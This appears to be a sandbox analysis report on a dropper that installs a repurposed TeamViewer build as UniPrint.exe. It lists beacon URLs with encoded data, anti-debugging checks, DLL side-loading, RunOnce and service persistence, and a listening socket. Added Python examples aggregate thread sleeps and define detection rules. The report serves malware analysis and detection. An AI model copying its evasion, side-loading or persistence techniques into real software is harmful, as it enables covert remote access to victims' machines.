Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU{*4
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmp Binary or memory string: J6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pUN*i
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp Binary or memory string: ?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU
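The "May sleep (evasive loops)" entries in this section are a per-thread budget: the sandbox counts each thread's sleep calls and sums their delays, then reports the thread once it exceeds 30 calls or 30 seconds in total. The negative figures are the NtDelayExecution convention, in which a negative interval means relative to now. Although the report suffixes the totals with "s", 301 sleeps summing to 150500 works out to about 500 ms per call, which fits the Sleep calls in the polling routines listed earlier on this page; treating the totals as milliseconds is this example's assumption. The aggregator below is an added example, not the sandbox's code, over a constructed trace format (SAMPLE_TRACE) that reproduces the three flagged threads and adds one benign thread.

```python
"""Aggregate per-thread sleep activity from an API trace.

Added example (not the sandbox's code) reproducing the arithmetic behind the
"Thread sleep count ... > 30" and "Thread sleep time ... >= -30000" entries
in the report. The trace line format and SAMPLE_TRACE are constructed; the
reading of the report's totals as milliseconds is an assumption.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Constructed trace format: "tid=<n> Sleep(<ms>)" or
# "tid=<n> NtDelayExecution(<100 ns units, negative = relative>)".
LINE = re.compile(r"tid=(\d+)\s+(Sleep|NtDelayExecution)\((-?\d+)\)")


@dataclass
class SleepStats:
    calls: int = 0
    total_ms: int = 0
    largest_ms: int = 0


def delay_to_ms(api: str, value: int) -> Optional[int]:
    """Normalise a delay argument to milliseconds; None if not a relative wait."""
    if api == "Sleep":
        return value              # already milliseconds
    if value < 0:                 # NtDelayExecution relative interval
        return -value // 10_000   # 100 ns units -> ms
    return None                   # absolute wake-up time: not attributable


def parse_trace(lines: Iterable[str]) -> Dict[int, SleepStats]:
    """Sum relative sleeps per thread id."""
    stats: Dict[int, SleepStats] = {}
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        tid, api, raw = int(m.group(1)), m.group(2), int(m.group(3))
        ms = delay_to_ms(api, raw)
        if ms is None:
            continue
        s = stats.setdefault(tid, SleepStats())
        s.calls += 1
        s.total_ms += ms
        s.largest_ms = max(s.largest_ms, ms)
    return stats


def flag_threads(stats: Dict[int, SleepStats], max_calls: int = 30,
                 max_total_ms: int = 30_000) -> Dict[int, List[str]]:
    """Thresholds follow the report: more than 30 calls or at least 30 s total."""
    flagged: Dict[int, List[str]] = {}
    for tid, s in sorted(stats.items()):
        reasons = []
        if s.calls > max_calls:
            reasons.append(f"count {s.calls} > {max_calls}")
        if s.total_ms >= max_total_ms:
            reasons.append(f"total {s.total_ms} ms >= {max_total_ms} ms")
        if reasons:
            flagged[tid] = reasons
    return flagged


# Constructed trace mirroring the three threads the report flags plus one
# benign thread: 301 and 294 half-second polls, one single 30 s wait.
SAMPLE_TRACE: List[str] = (
    ["tid=3040 Sleep(500)" for _ in range(301)]
    + ["tid=5512 Sleep(500)" for _ in range(294)]
    + ["tid=6328 NtDelayExecution(-300000000)"]        # 300,000,000 * 100 ns = 30 s
    + ["tid=1234 Sleep(100)" for _ in range(5)]
    + ["tid=1234 NtDelayExecution(132000000000000000)"]  # absolute time: ignored
)

if __name__ == "__main__":
    for tid, reasons in flag_threads(parse_trace(SAMPLE_TRACE)).items():
        print(tid, "; ".join(reasons))
```

The two thresholds catch different shapes. In the constructed trace TID 6328 (the svchost.exe thread in the report, which has a time entry but no count entry) clears the time threshold with one 30 s wait and would be missed by a count-only rule, while the two UniPrint.exe threads trip both. Keeping largest_ms alongside the total separates a single long wait, which a sandbox can skip forward, from hundreds of short polls that each re-check the environment.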

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Open window title or class name: ollydbg
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0053496B
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6E5CB420
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E88
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6E5C8AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_0051523A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0053496B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00534A9B

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C54A0 LogonUserW,GetLastError,CloseHandle, 3_2_6E5C54A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C34E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle, 3_2_6E5C34E0
Source: UniPrint.exe, 00000005.00000002.1075366890.0000000003CB0000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp Binary or memory string: Progman
Source: UniPrint.exe, 00000005.00000002.1075366890.0000000003CB0000.00000004.00000001.sdmp Binary or memory string: usercomputerusProgram ManagerC:\Windows\explorer.exe3910574588847
Source: UniPrint.exe, 00000005.00000002.1073825876.0000000001330000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: nsrC1CA.tmp.0.dr Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
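Read together, the Persistence and Installation Behavior, Boot Survival and DLL side loading entries describe an installation chain rather than isolated signatures: the installer on the desktop drops UniPrint.exe, TV.dll and Teamviewer_Resource_ja.dll into a ViberPC\Icons folder under the roaming profile and writes a TeamViewer.ini beside them; UniPrint.exe, which carries the TeamViewer_qs.pdb and TV.pdb paths and the TeamViewer and DynGate mutexes listed on this page, then creates processes through WMI Win32_Process::Create, registers itself under HKCU\...\RunOnce, writes a Services\USBManager\Parameters key, and a Windows svchost.exe loads TV.dll from that user-writable folder. The rules below are an added example, not the sandbox's output or any vendor's detection content: each step becomes a check over Sysmon-style events modelled as dicts, run over SAMPLE_EVENTS, which is constructed to mirror the report's lines (the SID, the RecordIds and the WMI-spawned child being UniPrint.exe itself are assumptions, since the page does not name that child).

```python
"""Detection rules for the installation chain this report records.

Added example, not part of the sandbox report or of the sample. Sysmon-style
events are modelled as plain dicts (event_id 1 process create, 7 image load,
11 file create, 12/13 registry) and every event in SAMPLE_EVENTS is
constructed to mirror the report's lines, not taken from a real log.
"""
import re
from typing import Callable, Dict, Iterable, List

Event = Dict[str, object]

APPDATA = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)   # user-writable profile path
WINDOWS_DIR = re.compile(r"^[a-z]:\\windows\\", re.I)
SERVICE_KEY = re.compile(
    r"^hklm\\system\\(currentcontrolset|controlset\d+)\\services\\[^\\]+", re.I)


def _base(path: object) -> str:
    return str(path).rsplit("\\", 1)[-1].lower()


def rule_wmi_spawn(ev: Event) -> bool:
    # Win32_Process::Create runs inside the WMI provider host, so the new
    # process's parent is WmiPrvSE.exe rather than the caller.
    return (ev.get("event_id") == 1
            and _base(ev.get("ParentImage", "")) == "wmiprvse.exe"
            and bool(APPDATA.search(str(ev.get("Image", "")))))


def rule_sideload(ev: Event) -> bool:
    # A Windows binary (svchost.exe in the report) loading a DLL from a
    # user-writable directory.
    return (ev.get("event_id") == 7
            and bool(WINDOWS_DIR.match(str(ev.get("Image", ""))))
            and bool(APPDATA.search(str(ev.get("ImageLoaded", "")))))


def rule_runonce(ev: Event) -> bool:
    return (ev.get("event_id") == 13
            and "\\currentversion\\runonce\\" in str(ev.get("TargetObject", "")).lower()
            and bool(APPDATA.search(str(ev.get("Details", "")))))


def rule_service_key(ev: Event) -> bool:
    # CreateServiceW goes through the SCM, so services.exe writes the service
    # key; a process writing under Services\<name> itself (the USBManager
    # Parameters key in the report) is the case worth surfacing.
    return (ev.get("event_id") in (12, 13)
            and bool(SERVICE_KEY.match(str(ev.get("TargetObject", ""))))
            and _base(ev.get("Image", "")) != "services.exe")


def rule_dropped_pe(ev: Event) -> bool:
    name = str(ev.get("TargetFilename", "")).lower()
    return (ev.get("event_id") == 11
            and name.endswith((".exe", ".dll"))
            and bool(APPDATA.search(name)))


RULES: Dict[str, Callable[[Event], bool]] = {
    "pe_dropped_in_appdata": rule_dropped_pe,
    "wmi_process_create": rule_wmi_spawn,
    "dll_sideload_from_user_dir": rule_sideload,
    "runonce_persistence": rule_runonce,
    "service_key_by_non_scm": rule_service_key,
}


def evaluate(events: Iterable[Event]) -> Dict[str, List[int]]:
    """Map each rule that fired to the RecordIds that triggered it."""
    fired: Dict[str, List[int]] = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                fired.setdefault(name, []).append(int(ev["RecordId"]))
    return fired


DROP_DIR = r"C:\Users\user\AppData\Roaming\ViberPC\Icons"
SAMPLE_EVENTS: List[Event] = [  # constructed, modelled on the report's lines
    {"RecordId": 1, "event_id": 11, "Image": r"C:\Users\user\Desktop\wogZe27GBB.exe",
     "TargetFilename": DROP_DIR + r"\UniPrint.exe"},
    {"RecordId": 2, "event_id": 11, "Image": r"C:\Users\user\Desktop\wogZe27GBB.exe",
     "TargetFilename": DROP_DIR + r"\TV.dll"},
    {"RecordId": 3, "event_id": 1, "Image": DROP_DIR + r"\UniPrint.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": '"' + DROP_DIR + r"\UniPrint.exe" + '" f'},
    {"RecordId": 4, "event_id": 7, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ImageLoaded": DROP_DIR + r"\TV.dll"},
    {"RecordId": 5, "event_id": 13, "Image": DROP_DIR + r"\UniPrint.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\UniPrint.exe",
     "Details": DROP_DIR + r"\UniPrint.exe"},
    {"RecordId": 6, "event_id": 12, "Image": DROP_DIR + r"\UniPrint.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\USBManager\Parameters"},
    # Benign controls that must not fire.
    {"RecordId": 7, "event_id": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemcomn.dll"},
    {"RecordId": 8, "event_id": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"RecordId": 9, "event_id": 12, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\USBManager"},
]

if __name__ == "__main__":
    for rule, ids in evaluate(SAMPLE_EVENTS).items():
        print(f"{rule:<28} records {ids}")
```

Each rule fires on its own, but the value is in the correlation: a DLL loaded by svchost.exe from a profile directory, a RunOnce value pointing into that same directory and a process whose parent is WmiPrvSE.exe within one user session is a far narrower query than any one of them, and it targets the installation pattern rather than the TeamViewer code itself, which a signature on the QuickSupport binary would also match on legitimate installs.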

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 3_2_6E5C7240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_xtoa_s@20, 5_2_0054113A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA, 5_2_0054E79D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA, 5_2_0054E87F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 5_2_0054E915
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA, 5_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 5_2_0054E987
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 5_2_0054EB57
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 5_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 5_2_0054EC16
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 5_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree, 5_2_6E5C7240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_0054B459
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,73D5A680,lstrcat,lstrlen, 0_2_00405B88
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6E5C8AF0

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 5_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp, 5_2_00511D6F